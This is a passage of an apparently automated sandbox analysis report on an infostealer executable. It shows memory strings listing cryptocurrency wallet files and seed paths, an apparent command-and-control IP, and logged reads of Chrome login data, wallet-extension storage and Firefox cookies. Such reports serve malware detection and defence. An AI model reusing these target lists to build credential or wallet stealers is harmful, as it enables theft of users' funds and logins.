Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2005702282.0000000000F87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2005702282.0000000000F87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: file.exe, 00000000.00000002.2005702282.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 16.113Users\user\AppData\Roaming\Binance\simple-storage.json
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2005702282.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 185.215.113.16\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.**z
Source: file.exe, 00000000.00000002.2005702282.0000000000F87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
